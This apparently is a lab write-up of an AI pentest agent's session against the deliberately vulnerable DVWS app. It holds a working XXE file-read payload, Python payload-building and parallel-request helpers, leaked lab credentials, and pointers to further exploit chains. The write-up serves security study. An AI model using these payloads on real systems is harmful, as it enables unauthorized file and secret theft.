
XXE 1IBLJ_sess_decoded

samuele edited this page Mar 30, 2026 · 1 revision

XXE-1IBLJ -- XXE via XML Import for File Exfiltration

Session Decoded: From Failed WSDL Hunt to Full Secrets Extraction in 9 Minutes


The Prompt

Target port 80. Discover SOAP/WSDL endpoints on the Express application.
Craft an XXE payload in the SOAP XML envelope to read /etc/passwd.
Escalate to exfiltrate application source code and environment files.

The prompt assumes there's a SOAP/WSDL service to exploit. There isn't one -- at least not in the traditional sense. The agent had to find the actual XXE vector on its own: an XML notes import feature buried inside the authenticated application.


What Happened: The Full Attack Chain

Phase 1 -- Recon and WSDL Hunt (8:38 - 8:39 PM)

The agent queried the Neo4j graph and found the target running Express on port 80, with known endpoints like /api/v2/login, /api/v2/notes, /api/upload. No SOAP/WSDL endpoints in the graph.

It launched 3 parallel probes:

  • Fetched the homepage -- found the DVWS login page with AngularJS frontend
  • Checked /api/v2/info -- got 403 Forbidden
  • Enumerated 19 common SOAP/WSDL paths (/wsdl, /soap, /service, /ws, /?wsdl, /api/v2/soap, etc.)

Result: All paths returned 404 except /?wsdl, which returned 200. But when the agent fetched it, the body was the same login page HTML: Express was serving the homepage rather than a real WSDL (the request is for the root path / with an ignored ?wsdl query string). Dead end.
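A 200 that merely echoes the homepage is easy to mistake for a hit. The sketch below shows one way to triage probe results by comparing each body against a fingerprint of the homepage. The function names and labels are illustrative assumptions; the session log does not show how the agent actually made this comparison.

```python
import hashlib


def body_fingerprint(body: str) -> str:
    """Hash a response body after trimming surrounding whitespace."""
    return hashlib.sha256(body.strip().encode("utf-8")).hexdigest()


def classify_probe(status: int, body: str, homepage_fp: str) -> str:
    """Label one probe result.

    'missing'        -> 404, path does not exist
    'homepage-echo'  -> 200 but the body is identical to the homepage
    'candidate'      -> 200 with a different body, worth a closer look
    'other'          -> anything else (403, 500, redirects, ...)
    """
    if status == 404:
        return "missing"
    if status == 200:
        if body_fingerprint(body) == homepage_fp:
            return "homepage-echo"
        return "candidate"
    return "other"
```

Fetching the homepage once, fingerprinting it, and passing that fingerprint to every probe keeps a path like /?wsdl from being reported as a live WSDL endpoint.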


Phase 2 -- The Pivot: Finding the Real XXE Vector (8:39 - 8:40 PM)

With no SOAP endpoint found, the agent pivoted with 3 parallel actions:

  1. Web search for "DVWS Damn Vulnerable Web Services SOAP XXE endpoint" -- confirmed the app has intentional XXE vulnerabilities
  2. Fetched home.html (the authenticated homepage) -- this was the breakthrough. The navigation menu revealed an "Import Notes (XML)" feature at import_notes.html
  3. Continued SOAP path enumeration with 18 more paths -- all 404

The agent then fetched import_notes.html source code and extracted the exact attack surface:

  • Endpoint: POST /api/v2/notes/import/xml
  • Format: JSON body { xml: xmlData } with JWT Bearer token
  • Expected XML: <notes><note><name>...</name><body>...</body><type>...</type></note></notes>
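As a minimal sketch of what such a request looks like, the helper below assembles the method, URL, headers, and JSON body for the import endpoint. The endpoint path, the `xml` key, and the Bearer scheme come from the write-up; `build_import_request`, the base URL, and the token value are hypothetical.

```python
import json

IMPORT_PATH = "/api/v2/notes/import/xml"  # endpoint reported in the write-up


def build_import_request(base_url: str, token: str, xml_data: str) -> dict:
    """Describe the import request without sending it."""
    return {
        "method": "POST",
        "url": base_url.rstrip("/") + IMPORT_PATH,
        "headers": {
            "Authorization": f"Bearer {token}",
            "Content-Type": "application/json",
        },
        # json.dumps escapes the quotes and newlines inside the XML string
        "body": json.dumps({"xml": xml_data}),
    }
```

With the requests library, the result could be sent as `requests.post(req["url"], headers=req["headers"], data=req["body"])`.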

Phase 3 -- Account Setup (8:40 - 8:41 PM)

The agent registered testxxe:testxxe123 and logged in to get a JWT token. Straightforward -- two API calls.


Phase 4 -- XXE Crafting: Two Failures, Then Success (8:41 - 8:42 PM)

Attempt 1 -- Shell escaping disaster: The agent sent the XXE payload via curl with shell variable interpolation. The double quotes inside the XML broke the JSON structure.

Response: SyntaxError: Expected ',' or '}' after property value in JSON at position 24

But the error stack trace leaked a critical piece of info: the application path is /home/dvws-node/. The agent noted this for later file exfiltration.

Recovery: Switched from curl to Python requests with json.dumps() for proper encoding.
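The difference is easy to reproduce offline. This sketch contrasts hand-assembled JSON, which breaks on the double quotes in the XML declaration, with json.dumps(), which escapes them. The XML string is a shortened stand-in, not the payload from the session.

```python
import json

xml = '<?xml version="1.0" encoding="UTF-8"?><notes/>'

# Naive string concatenation: the quotes inside the XML end the JSON string early.
naive = '{"xml": "' + xml + '"}'
try:
    json.loads(naive)
    naive_ok = True
except json.JSONDecodeError:
    naive_ok = False

# json.dumps escapes every embedded quote, so the body parses and round-trips.
safe = json.dumps({"xml": xml})
round_trip = json.loads(safe)["xml"]
```

Shell interpolation into a curl `-d` argument has the same failure mode as the naive concatenation here, with shell quoting layered on top.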

Attempt 2 -- Mongoose validation rejection: The payload used <type>text</type>, but Mongoose schema validation rejected it:

"text is not a valid enum value for path type.0"

The error helpfully listed valid values: note, reminder, list, secret, public.

Recovery: Changed to <type>note</type> and moved the XXE entity reference to the <name> field.

Attempt 3 -- /etc/passwd exfiltrated:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<notes>
  <note>
    <name>&xxe;</name>
    <body>xxe-test</body>
    <type>note</type>
  </note>
</notes>

Response: HTTP 200 -- "Successfully imported 1 notes."
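The lessons from the two failed attempts can be folded into a small payload builder. The sketch below reproduces the payload shown above for an arbitrary file path and refuses note types the server would reject. The list of valid types is the one reported by the Mongoose error; the function name and the marker default are assumptions.

```python
VALID_TYPES = {"note", "reminder", "list", "secret", "public"}


def build_xxe_note(file_path: str, note_type: str = "note",
                   marker: str = "xxe-test") -> str:
    """Build an import document whose <name> expands an external entity."""
    if note_type not in VALID_TYPES:
        raise ValueError(f"{note_type!r} is not an accepted note type")
    if '"' in file_path:
        raise ValueError("file path must not contain a double quote")
    lines = [
        '<?xml version="1.0" encoding="UTF-8"?>',
        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file://{file_path}">]>',
        "<notes>",
        "  <note>",
        "    <name>&xxe;</name>",      # entity lands in the name field
        f"    <body>{marker}</body>",  # marker makes the note easy to find later
        f"    <type>{note_type}</type>",
        "  </note>",
        "</notes>",
    ]
    return "\n".join(lines)
```

The marker in the body gives a stable value to search for when reading the notes back, since the name field will hold whatever the file contained.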

The agent then fetched its notes via GET /api/v2/notes and found the name field contained the full /etc/passwd:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
node:x:1000:1000::/home/node:/bin/bash

19 system users. Two with shell access (root and node).
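The shell-access count can be checked mechanically. This is a minimal sketch of a passwd parser that lists accounts whose shell is not nologin or false; the sample input is limited to the three lines quoted above, so it finds 3 entries rather than the full 19.

```python
NON_LOGIN_SHELLS = ("nologin", "false")


def parse_passwd(text: str) -> list:
    """Parse passwd-format text, skipping blanks, comments, and elided lines."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # e.g. the "..." placeholder in the excerpt
        entries.append({
            "user": fields[0],
            "uid": int(fields[2]),
            "home": fields[5],
            "shell": fields[6],
        })
    return entries


def login_users(entries: list) -> list:
    """Return user names whose shell looks like a real login shell."""
    return [e["user"] for e in entries
            if e["shell"] and not e["shell"].endswith(NON_LOGIN_SHELLS)]


sample = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
node:x:1000:1000::/home/node:/bin/bash"""

entries = parse_passwd(sample)
shell_users = login_users(entries)
```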


Phase 5 -- Escalation: Secrets Extraction (8:43 - 8:45 PM)

With the XXE confirmed, the agent launched 3 parallel payloads targeting high-value files:

| Target File | Result |
| --- | --- |
| /home/dvws-node/server.js | FAILED -- JavaScript source contains < and & characters, which are parsed as markup once the entity is expanded |
| /home/dvws-node/.env | SUCCESS |
| /proc/self/environ | FAILED -- null bytes between variables are invalid in XML |
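These outcomes follow a pattern that can be estimated before a payload is sent, given a guess at what the file contains. The sketch below is a conservative heuristic, not a parser: it flags content that an inline external entity is unlikely to survive. The function name and messages are illustrative.

```python
def inline_xxe_blockers(data: bytes) -> list:
    """List reasons a file's content would likely break inline entity expansion."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return ["not valid UTF-8"]
    problems = []
    # XML 1.0 allows only tab, newline, and carriage return below U+0020.
    if any(ord(ch) < 0x20 and ch not in "\t\n\r" for ch in text):
        problems.append("control character (such as NUL) not allowed in XML 1.0")
    if "<" in text:
        problems.append("'<' would be parsed as the start of markup")
    if "&" in text:
        problems.append("'&' would be parsed as the start of a reference")
    return problems
```

A key=value file such as .env passes all three checks, while typical JavaScript source and the NUL-separated /proc/self/environ do not. The check is deliberately strict: content with well-formed tags or valid references such as `&amp;` would be flagged even though a parser could accept it.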

The .env file revealed everything:

EXPRESS_JS_PORT=80
XML_RPC_PORT=9090
GRAPHQL_PORT=4000
JWT_SECRET=access
MONGO_LOCAL_CONN_URL=mongodb://localhost:27017/node-dvws
MONGO_DB_NAME=dvws-user-auth
SQL_LOCAL_CONN_URL=localhost
SQL_DB_NAME=dvws_sqldb
SQL_USERNAME=root
SQL_PASSWORD=mysecretpassword

The agent then attempted package.json (succeeded) and a CDATA-wrapped parameter entity approach for server.js (failed -- the XML specification forbids parameter entity references inside markup declarations in the internal DTD subset, and libxml2 enforces this).
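The session summary does not reproduce the CDATA payload, so the following is only a sketch of the usual shape of that technique, built as a string for inspection. The entity names `start`, `file`, `end`, and `wrapped` are assumptions.

```python
def build_cdata_attempt(file_path: str) -> str:
    """Build the classic CDATA-wrapping document using only the internal subset."""
    lines = [
        '<?xml version="1.0" encoding="UTF-8"?>',
        "<!DOCTYPE foo [",
        '  <!ENTITY % start "<![CDATA[">',
        f'  <!ENTITY % file SYSTEM "file://{file_path}">',
        '  <!ENTITY % end "]]>">',
        # The next declaration is the problem: it references parameter
        # entities inside a markup declaration, which the XML 1.0
        # well-formedness rules forbid in the internal subset.
        '  <!ENTITY wrapped "%start;%file;%end;">',
        "]>",
        "<notes><note><name>&wrapped;</name>"
        "<body>xxe-test</body><type>note</type></note></notes>",
    ]
    return "\n".join(lines)
```

The same `wrapped` declaration is permitted in an external DTD, which is why the technique normally depends on the parser being able to load a DTD from a location the tester controls.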

The package.json revealed the full dependency tree, including:

  • libxmljs v1.0.11 -- the libxml2 binding that parses the imported XML, and the parser through which the XXE was reachable
  • node-serialize v0.0.4 -- known deserialization RCE vulnerability
  • mysql + mysql2 + sequelize -- potential SQL injection surface
  • Main entry point: app.js (not server.js as initially guessed)
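A review like this can be scripted once the file has been exfiltrated. The sketch below reads a package.json string, reports the entry point, and flags dependencies that appear on a watchlist. The watchlist notes and the sample document are made up for illustration; only the package names, the two versions, and the app.js entry point come from the write-up.

```python
import json

# Hypothetical watchlist: package name -> why it deserves a closer look
WATCHLIST = {
    "libxmljs": "XML parsing (XXE if entity substitution is enabled)",
    "node-serialize": "unsafe deserialization",
    "mysql": "raw SQL access",
    "mysql2": "raw SQL access",
    "sequelize": "ORM with raw query support",
}


def review_package(package_json_text: str):
    """Return (entry point, [(name, version, note), ...]) for watched packages."""
    pkg = json.loads(package_json_text)
    deps = {**pkg.get("dependencies", {}), **pkg.get("devDependencies", {})}
    findings = [(name, deps[name], WATCHLIST[name])
                for name in sorted(deps) if name in WATCHLIST]
    return pkg.get("main"), findings


# Made-up sample; the real file's contents are not shown in the summary.
sample_pkg = json.dumps({
    "main": "app.js",
    "dependencies": {
        "express": "4.0.0",
        "libxmljs": "1.0.11",
        "node-serialize": "0.0.4",
    },
})

entry_point, findings = review_package(sample_pkg)
```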

Final Scoreboard

Files Exfiltrated

| File | Secrets Found |
| --- | --- |
| /etc/passwd | 19 system users, 2 with shell access |
| /home/dvws-node/.env | JWT secret (access), MySQL root password (mysecretpassword), MongoDB connection string, port mappings |
| /home/dvws-node/package.json | Full app structure, vulnerable dependencies, entry point |

Files That Failed

| File | Why |
| --- | --- |
| server.js / app.js | JS source contains XML-special chars (< and &) -- would need an external DTD for OOB exfiltration |
| /proc/self/environ | Null byte separators are invalid in XML |

Credentials Extracted

| Asset | Value |
| --- | --- |
| JWT Signing Secret | access |
| MySQL Root Password | mysecretpassword |
| MongoDB | No auth required (localhost:27017) |

Timeline Summary

| Time | Action | Result |
| --- | --- | --- |
| 8:38 | Query recon graph | Found target info, no SOAP endpoints |
| 8:38 | Probe homepage + 19 WSDL paths | All 404; /?wsdl returned the login page, not a WSDL |
| 8:39 | Web search + fetch home.html | Found "Import Notes (XML)" feature |
| 8:40 | Fetch import_notes.html source | Extracted exact endpoint + XML format |
| 8:40 | Register testxxe account | Account created |
| 8:41 | Login for JWT token | Token obtained |
| 8:41 | XXE attempt #1 (curl) | JSON escaping failure -- leaked app path |
| 8:41 | XXE attempt #2 (Python) | Mongoose enum validation failure -- learned valid types |
| 8:42 | XXE attempt #3 | /etc/passwd exfiltrated |
| 8:43 | 3 parallel XXE payloads | .env SUCCESS, server.js FAIL, /proc/self/environ FAIL |
| 8:44 | package.json + CDATA attempt | package.json SUCCESS, CDATA server.js FAIL |
| 8:46 | Final summary | 3 files exfiltrated, 3 credential sets extracted |

Total time: ~9 minutes from first request to full secrets extraction.


Key Agent Capabilities Demonstrated

1. Endpoint Discovery Without Documentation

No SOAP/WSDL existed. The agent found the real XXE vector by reading the authenticated homepage HTML, discovering the "Import Notes (XML)" feature, then reading the import page's JavaScript source to extract the exact API endpoint and XML format.

2. Error-Driven Intelligence Gathering

Every failure taught the agent something:

  • JSON parse error leaked the app path (/home/dvws-node/)
  • Mongoose validation error revealed valid enum values (note, reminder, list, secret, public)
  • These "failures" directly informed the successful payload.
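Mining an error body for paths is simple to automate. The sketch below pulls file paths out of Node-style stack frames and reports the directory above node_modules as the likely application root. The sample trace is made up: the first line is the error quoted earlier, but the frames beneath it are an assumption about what such a trace typically looks like.

```python
import re

# Matches "(/abs/path/file.js:LINE:COL)" at the end of a Node stack frame
FRAME_RE = re.compile(r"\((/[^():\s]+):\d+:\d+\)")


def app_roots(stack_trace: str) -> list:
    """Return candidate application roots found in a stack trace."""
    roots = set()
    for path in FRAME_RE.findall(stack_trace):
        head, sep, _ = path.partition("/node_modules/")
        if sep:  # only frames that live under a node_modules directory
            roots.add(head + "/")
    return sorted(roots)


sample_trace = """SyntaxError: Expected ',' or '}' after property value in JSON at position 24
    at JSON.parse (<anonymous>)
    at parse (/home/dvws-node/node_modules/body-parser/lib/types/json.js:89:19)
    at /home/dvws-node/node_modules/body-parser/lib/read.js:128:18"""

roots = app_roots(sample_trace)
```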

3. Knowing What Works and What Doesn't

The agent understood XML parser limitations: JS source code breaks inline XXE (its < and & characters are parsed as markup once the entity is expanded), and /proc/self/environ contains null bytes, which XML does not allow. It correctly identified that an external DTD (OOB exfiltration) would be needed for source code -- but prioritized the high-value .env and package.json targets that it could extract inline.

4. Parallel Escalation

Once the XXE was confirmed, the agent immediately fired 3 parallel payloads at different files, then another 2 in the next wave. No sequential waiting -- maximum throughput.
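A wave of this kind can be sketched with a thread pool. In the example below, `send` stands in for whatever function submits one payload and reads the result back; it is a hypothetical callable supplied by the caller, and the stub used here only imitates the outcomes reported for the first wave.

```python
from concurrent.futures import ThreadPoolExecutor


def run_wave(send, targets: list, max_workers: int = 3) -> dict:
    """Run send(path) for every target concurrently and collect outcomes."""
    def attempt(path):
        try:
            return send(path)
        except Exception as exc:  # record the failure instead of aborting the wave
            return f"FAILED: {exc}"

    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        # pool.map yields results in the same order as targets
        return dict(zip(targets, pool.map(attempt, targets)))


def fake_send(path: str) -> str:
    """Stub sender that imitates the first wave's reported results."""
    if path.endswith(".env"):
        return "SUCCESS"
    raise RuntimeError("XML parse error")


wave = run_wave(fake_send, [
    "/home/dvws-node/server.js",
    "/home/dvws-node/.env",
    "/proc/self/environ",
])
```

Catching exceptions per target keeps one failed file from discarding the results of the others.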

5. Attack Surface Mapping for Future Chains

The extracted package.json didn't just confirm the current attack -- it mapped future attack vectors: node-serialize for deserialization RCE, mysql/sequelize for SQL injection, needle for SSRF. The .env credentials could enable direct database access wherever those services are reachable. One XXE opened the door to the rest of the attack surface.


Raw Session Log

The complete unedited agent session log is available in XXE-1IBLJ_session.md.
